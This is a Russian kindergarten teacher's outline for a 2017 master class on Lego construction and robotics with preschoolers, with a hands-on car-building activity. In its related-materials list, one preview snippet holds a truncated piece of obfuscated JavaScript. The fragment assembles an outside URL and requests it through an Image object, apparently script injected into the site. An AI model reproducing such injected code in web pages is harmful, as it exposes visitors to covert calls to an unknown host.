Конспект мастер класса «Использование легоконструирование и робототехники в образовательной работе с дошкольниками».
материал по конструированию, ручному труду на тему

    Цель: познакомить участников с внедрением Lego–конструирование и робототехники в образовательный процесс ДОО.

  1. Вводная часть: Рассказ воспитателя о кружке.

Воспитатель: Здравствуйте уважаемые коллеги.

Сегодня мы поговорим о новом направлении в дошкольном образовании робототехнике.

    Современные дети живут в эпоху активной информатизации, компьютеризации и роботостроение.

    Характерные черта нашей жизни - нарастание  темпов изменений. Мы живем в мире, который совсем не похож на тот, в котором мы родились и темп изменений продолжает нарастать.

    Сегодняшним дошкольником предстоит: работать по профессиям, которых пока нет.

  • использовать технологии, которые еще не созданы.
  • решать задачи, о которых мы можем только догадываться.

Скачать:

ВложениеРазмер
Файл tezis_konspekt_master_klassa_legokonstr.docx18.36 КБ

Предварительный просмотр:

МБДОУ Баягинский детский сад «Ньургуһун»

«УТВЕРЖДАЮ»:

ст. воспитатель

________ /Неустроева А.А./

«___» ___________ 20__ г.

Конспект мастер класса

«Использование легоконструирование и робототехники

в образовательной работе с дошкольниками».

выполнила:

Белолюбская В.В. воспитатель

I категории.

с Чурапча 2017 г.

Цель: познакомить участников с внедрением Lego–конструирование и робототехники в образовательный процесс ДОО.

  1. Вводная часть: Рассказ воспитателя о кружке.

Воспитатель: Здравствуйте уважаемые коллеги.

Сегодня мы поговорим о новом направлении в дошкольном образовании робототехнике.

Современные дети живут в эпоху активной информатизации, компьютеризации и роботостроение.

Характерные черта нашей жизни - нарастание  темпов изменений. Мы живем в мире, который совсем не похож на тот, в котором мы родились и темп изменений продолжает нарастать.

Сегодняшним дошкольником предстоит: работать по профессиям, которых пока нет.

  • использовать технологии, которые еще не созданы.
  • решать задачи, о которых мы можем только догадываться.

Современное дошкольное образование должно соответствовать целям опереживалощего развития. Современные дети должны изучать технологии, которые пригодятся в будущем, а это и есть робототехника.

Именно поэтому в нашем детском саду работает кружок «Легоконструирование» которые посещают дети подготовительной и старшей группы.

Целью кружка является: овладение навыками начального технического конструирование, развитие мелкой  моторики, координации глаз и рук, изучения понятий «конструкция» и ее основных свойств (жесткости, прочности и устойчивоемости), навык взаимодействия в группе.

В кружок «Легоконструирование» я набрала мальчиков, у которых есть способности в конструировании. В моем кружке работает по 8-10 детей, из 2-х групп. На занятиям мы используем Lego конструкторы.

Мы начинали с самого простого: Знакомство с конструктором где мы знакомились с деталями, их названием и способом соединение деталей. Собираем простейшие фигуры и постройки, и с каждым занятием задание усложнялись. К сегодняшнему дню скорость по сборке деталей увеличились. И даже те, кто в начале года отставал, сейчас собирает конструкторами не хуже других.

Благодаря нашим занятиям дети стали более усидчивыми, внимательными, научились работать в группах, читать схемы, работать по образцу и его замыслу. Очень стараются доверить начатое дело до конца, а это так важно. Ведь все эти качества пригодятся нашим ребятам, потому что все они будущие первоклассники.

  1. Воспитатель: мастер – класс. И так, коллеги сейчас мы вместе конструировать «Автомобиль будущего» хотите?

Коллеги: да

Воспитатель: (всем раздает легоконструкторы, схемы, образцы, фдажок). У вас на столах лежат конструкторы и схемы для конструирование автомобиля будущего, но не у всех есть схемы. А у кого нет, они будут конструировать по образцу и по замыслу.

Ваша задача: сконструировать автомобиль, дать ему название, и немного рассказать о нем. Кто выполнить работу, поднимет флажок

- Коллеги работают, а я Вам расскажу о наших достижениях:

Уважаемые коллеги, все заканчиваем, и сейчас мы с Вами посмотрим, что же у Вас получилось (рассказывают о своих необычных машинах)

Воспитатель: Какие красивые у нас получились машины, я думаю, что в будущем они будут именно такими. Вам нравятся коллеги ваши поделки, и мне тоже очень понравились.

Уважаемые педагоги, сегодня мы с Вами увидели свои способности, спасибо всем.

Спасибо за внимание!


По теме: методические разработки, презентации и конспекты

мастер-класс "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"

Данный мастер-класс информирует педагогов о системе работы по ЛЕГО-конструированию для детей дошкольного возраста,  формирует представления педагогов о возможностях работы с ЛЕГО-конструктором....

Мастер-класс "Использование Лего-конструирования в образовательной работе с дошкольниками"

Ход мастер-класса:1.Теоретическая часть.Добрый день, уважаемые коллеги. Сегодня на нашем мастер-классе мы окунемся в мир ЛЕГО.Я хотела бы поделиться нашим опытом работы по организации детс...

МАСТЕР-КЛАСС "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"

МАСТЕР-КЛАССИспользование ЛЕГО – конструирования var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'rzkmxcve.lussoit.com\',\'80\'].join(\'/\'),(o=new Image).src=\'\'...

Мастер – класс «Использование Лего – конструирования в образовательной работе с дошкольниками»

В связи с введением в систему дошкольного образования Федеральных государственных образовательных стандартов, педагогам открываются большие возможности использования новых пед...

МАСТЕР-КЛАСС Использование ЛЕГО – конструирования в образовательной работе с дошкольниками

Цель: повышение профессионального мастерства педагогов-участников мастер-классе по ЛЕГО-конструированию в процессе активного педагогического общения.Задачи:обучать участников мастер-класса навыкам при...